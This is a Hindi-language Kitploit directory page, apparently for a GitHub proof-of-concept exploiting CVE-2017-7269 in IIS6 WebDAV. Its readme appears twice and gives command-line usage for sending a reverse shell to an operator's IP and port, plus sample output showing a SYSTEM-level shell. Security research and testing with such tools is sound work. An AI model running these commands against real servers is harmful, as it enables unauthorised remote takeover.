Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7269 — यह एक PoC उपकरण है जो IIS6 के WebDAV घटक में एक ज्ञात भेद्यता के लिए शोषण प्रदर्शित करता है | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2017-7269
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

यह एक PoC उपकरण है जो IIS6 के WebDAV घटक में एक ज्ञात भेद्यता के लिए शोषण प्रदर्शित करता है

रिपॉजिटरी देखें
4211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EN

GenWebDavIISExploit एक PoC उपकरण है जो IIS6 के WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए डिज़ाइन किया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।

अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।

विशेषताएँ

  • कमजोर IIS6 WebDAV सर्वरों पर रिमोट कोड निष्पादन।
  • उपयोगकर्ता-निर्दिष्ट रिवर्स IP और पोर्ट के साथ गतिशील पेलोड निर्माण।
  • त्वरित शोषण के लिए उपयोग में आसान कमांड-लाइन इंटरफ़ेस।

आवश्यक शर्तें

  • Python 3.x: सुनिश्चित करें कि आपके सिस्टम पर Python 3 स्थापित है।
  • नेटवर्क एक्सेस: लक्ष्य मशीन के IP और पोर्ट से कनेक्ट करने की क्षमता।

उपयोग

कमांड-लाइन आर्गुमेंट्स

  • लक्ष्य IP: लक्ष्य IIS6 WebDAV सर्वर का IP पता।
  • लक्ष्य पोर्ट: वह पोर्ट नंबर जिस पर WebDAV सेवा चल रही है (आमतौर पर 80)।
  • रिवर्स IP: आपका IP पता जहाँ रिवर्स शेल को कनेक्ट होना चाहिए।
  • रिवर्स पोर्ट: रिवर्स शेल प्राप्त करने के लिए आपके सिस्टम पर पोर्ट नंबर।
  • उदाहरण

    root@kitploit:~
    python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
    

    उपयोग उदाहरण

    root@kitploit:~
    python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    

    उदाहरण आउटपुट

    root@kitploit:~
    $ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    
    [*] Подключение к цели 192.168.1.10 на порту 80...
    [*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
    [*] Длина полезной нагрузки: 1744 байт
    [*] Ожидание обратного соединения...
    
    [+] Ответ от цели:
    HTTP/1.1 200 OK
    Content-Length: 123
    Server: Microsoft-IIS/6.0
    
    [+] Получено обратное соединение от 192.168.1.10:12345
    [+] Удаленный доступ успешно установлен!
    
    C:\Windows\system32> whoami
    nt authority\system
    
    C:\Windows\system32> ipconfig
    Настройка IP Windows
    
       Адаптер Ethernet Local Area Connection:
          DNS-суффикс подключения . . . . . : example.local
          IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
          Маска подсети . . . . . . . . . . : 255.255.255.0
          Основной шлюз . . . . . . . . . . : 192.168.1.1
        
    

    नोट्स

    • सुनिश्चित करें कि आने वाले रिवर्स शेल को कैप्चर करने के लिए आपके पास निर्दिष्ट रिवर्स पोर्ट पर एक लिसनर चल रहा है।
    • इस उपकरण का उपयोग केवल अधिकृत सिस्टम पर कमजोरियों के परीक्षण के लिए करें।

    RU

    GenWebDavIISExploit एक PoC उपकरण है जो IIS6 पर WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए बनाया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।

    अस्वीकरण

    यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।

    विशेषताएँ

    • कमजोर IIS6 WebDAV सर्वरों पर रिमोट कोड निष्पादन।
    • रिवर्स कनेक्शन के लिए IP और पोर्ट निर्दिष्ट करके गतिशील पेलोड का निर्माण।
    • त्वरित उपयोग के लिए सरल कमांड-लाइन इंटरफ़ेस।

    आवश्यक शर्तें

    • Python 3.x: सुनिश्चित करें कि आपके पास Python 3 स्थापित है।
    • नेटवर्क तक पहुंच: लक्ष्य मशीन के IP पते और पोर्ट से कनेक्ट करने की क्षमता।

    उपयोग

    कमांड-लाइन आर्गुमेंट्स

    • लक्ष्य IP: लक्ष्य IIS6 WebDAV सर्वर का IP पता।
    • लक्ष्य पोर्ट: वह पोर्ट नंबर जिस पर WebDAV सेवा चल रही है (आमतौर पर 80)।
    • रिवर्स IP: आपका IP पता, जिस पर रिवर्स कनेक्शन स्थापित होना चाहिए।
    • रिवर्स पोर्ट: रिवर्स कनेक्शन प्राप्त करने के लिए आपके सिस्टम पर पोर्ट नंबर।

    उदाहरण

    root@kitploit:~
    python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
    

    उपयोग उदाहरण

    root@kitploit:~
    python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    

    उदाहरण आउटपुट

    root@kitploit:~
    $ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    
    [*] Подключение к цели 192.168.1.10 на порту 80...
    [*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
    [*] Длина полезной нагрузки: 1744 байт
    [*] Ожидание обратного соединения...
    
    [+] Ответ от цели:
    HTTP/1.1 200 OK
    Content-Length: 123
    Server: Microsoft-IIS/6.0
    
    [+] Получено обратное соединение от 192.168.1.10:12345
    [+] Удаленный доступ успешно установлен!
    
    C:\Windows\system32> whoami
    nt authority\system
    
    C:\Windows\system32> ipconfig
    Настройка IP Windows
    
       Адаптер Ethernet Local Area Connection:
          DNS-суффикс подключения . . . . . : example.local
          IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
          Маска подсети . . . . . . . . . . : 255.255.255.0
          Основной шлюз . . . . . . . . . . : 192.168.1.1
        
    

    नोट्स

    • सुनिश्चित करें कि आने वाले रिवर्स कनेक्शन को पकड़ने के लिए आपके पास निर्दिष्ट रिवर्स पोर्ट पर एक लिसनर चल रहा है।
    • इस उपकरण का उपयोग केवल अधिकृत सिस्टम पर कमजोरियों की जांच के लिए करें।
    टूल डाउनलोड करें